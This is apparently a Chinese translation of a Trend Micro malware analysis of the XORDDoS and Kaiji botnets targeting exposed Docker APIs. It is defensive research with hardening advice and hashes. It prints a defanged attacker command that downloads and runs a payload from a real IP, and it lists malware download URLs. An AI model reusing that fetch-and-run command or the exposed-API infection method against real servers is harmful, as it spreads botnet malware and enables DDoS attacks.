XORDDoS 和 Kaiji 殭屍網路病毒鎖定暴露的Docker伺服器

趨勢科技最近偵測到兩種會攻擊暴露Docker伺服器的Linux殭屍網路病毒;它們是XORDDoS惡意軟體(趨勢科技偵測為Backdoor.Linux.XORDDOS.AE)和Kaiji DDoS惡意軟體(趨勢科技偵測為DDoS.Linux.KAIJI.A)。

將Docker伺服器當作目標是XORDDoS和Kaiji的新發展。XORDDoS已知會攻擊雲端環境內的Linux主機,而最近出現的Kaiji最初被發現是針對物聯網(IoT ,Internet of Thing裝置。攻擊者通常會掃描開放的SSH和Telnet端口,再來用殭屍網路進行暴力攻擊。現在它們會用暴露端口2375來搜尋Docker伺服器。端口2375是Docker API使用的兩個端口之一,用於未加密和無身份認證通訊

但這兩種惡意軟體的攻擊方法有著顯著差異。XORDDoS攻擊會入侵Docker伺服器來感染所有託管的容器,Kaiji則會部署自己的容器來放DDoS惡意軟體。

這些惡意軟體可以用來進行分散式阻斷服務攻擊HYPERLINK “http://blog.trendmicro.com.tw/?p=16497” (DDoS)攻擊,這是種封鎖、破壞或關閉網路、網站或服務的攻擊。利用眾多系統所產生的流量來癱瘓目標系統,讓其他使用者無法連上。

XORDDoS惡意軟體分析


XORDDoS感染鏈從攻擊者搜尋公開Docker API端口2375的主機開始。接著會送出命令來列出託管在Docker伺服器上的容器。之後攻擊者會對所有的容器執行下列命令,用XORDDoS惡意軟體感染所有容器:

wget hxxp://122[.]51[.]133[.]49:10086/VIP –O VIP chmod 777 VIP ./VIP

XORDDoS惡意程式(趨勢科技偵測為Backdoor.Linux.XORDDOS.AE)仍然用之前攻擊所用的XOR金鑰(BB2FA36AAA9541F0)來加密字串及跟命令和控制(C&C)伺服器通訊。它還會在機器內部建立多個副本來作為持續性機制。

圖1. XORDDoS建立多個自身副本的程式碼片段

惡意程式會啟動SYN、ACK和DNS類型的DDoS攻擊。

圖2.顯示XORDDoS可發動DDoS攻擊類型的程式碼片段

它還可以下載和執行更多惡意軟體或進行自我更新。

圖3. 顯示XORDDoS下載和更新檔案能力的程式碼片段。

它會收集下列與發動DDoS攻擊有關的資料:

  • CPU資訊
  • 執行中程序的MD5
  • 記憶體資訊
  • 網路速度
  • 執行中程序的PID

要特別注意的是,此次XORDDoS變種所表現出的大多數行為都在較早版本中出現過。

進一步研究攻擊者相關的網址時,我們發現了其他惡意軟體,如Backdoor.Linux.DOFLOO.AB(Dofloo/AESDDoS Linux殭屍網路病毒),之前也曾攻擊暴露的Docker API

Kaiji 惡意軟體分析


跟XORDDoS惡意軟體一樣,Kaiji現在也會針對暴露的Docker伺服器進行散播。攻擊者會掃描網際網路上有暴露端口2375的主機。找到目標後會先ping Docker伺服器,再來部署執行Kaiji程式的惡意ARM容器。

腳本123.sh(趨勢科技偵測為Trojan.SH.KAIJI.A)會下載並執行惡意軟體linux_arm(趨勢科技偵測為DDoS.Linux.KAIJI.A)。接著此腳本還會移除其他進行DDoS攻擊所不需要的Linux作業系統基本組件。

圖4. 查詢下載和執行123.sh

Figure 5. Code snippet showing the removal of Linux binaries

圖5. 顯示如何移除Linux檔案的程式碼片段

Kaiji DDoS惡意程式linux_arm會發動以下DDoS攻擊:

  • ACK攻擊
  • IPS欺騙攻擊
  • SSH攻擊
  • SYN攻擊
  • Synack攻擊
  • TCP洪水攻擊
  • UDP洪水攻擊

它還會收集下列資料來用於上述攻擊:

  • CPU資訊
  • 資料夾
  • 網域名稱
  • 主機IP地址
  • 執行中程序的PID
  • URL scheme

防護 Docker 伺服器安全建議


從這些發現可以看出惡意軟體作者會不斷地用新功能來升級其作品,好利用其他進入點進行攻擊。因為Docker伺服器可以較輕易地部署到雲端,也讓它成為企業越來越愛用的選項。但這也讓它們成為吸引網路犯罪分子的誘人目標。

底下是一些防護Docker伺服器安全的建議

  • 防護容器主機。使用監視工具,且用為容器設計的作業系統來託管容器。
  • 防護網路環境。利用入侵防禦系統(IPS)和網頁過濾技術來提供能見度跟監控進出網路流量。
  • 防護管理工具。監視並保護容器儲存庫且強化Kubernetes的安裝。
  • 防護構建管道。實施徹底且一致的存取控制方案並安裝強大的端點控制。
  • 遵守推薦的最佳實作
  • 使用安全工具來掃描和保護容器。

建議用安全解決方案來保護Docker伺服器。可以用趨勢科技Hybrid Cloud Security來為實體、虛擬和雲端的工作負載提供自動化的安全性和保護,包括了:

入侵指標

Kaiji

檔案名稱SHA 256趨勢科技病毒碼偵測
123.sh9301d983e9d8fad3cc205ad67746cd111024daeb4f597a77934c7cfc1328c3d8Trojan.SH.KAIJI.A
linux_armd315b83e772dfddbd2783f016c38f021225745eb43c06bbdfd92364f68fa4c56DDoS.Linux.KAIJI.A

相關網址:

  • hxxp://62[.]171[.]160[.]189/linux_arm
  • hxxp://62[.]171[.]160[.]189/11/123.sh

XORDDoS和其他透過同一網址找到的惡意軟體

SHA 256趨勢科技病毒碼偵測
dba757c20fbc1d81566ef2877a9bfca9b3ddb84b9f04c0ca5ae668b7f40ea8c3Backdoor.Linux.XORDDOS.AE
6c8f95b82592ac08a03bfe32e4a4dbe637d1f542eb3ab3054042cec8ec301a3cBackdoor.Linux.DOFLOO.AB
286f774eb5b4f2f7c62d5e68f02a37b674cca7b8c861e189f1f596789322f9feBackdoor.Win32.SDDOS.A

相關網址:

  • hxxp://122[.]51[.]133[.]49:10086/VIP

@原文出處:XORDDoS, Kaiji Botnet Malware Variants Target Exposed Docker Servers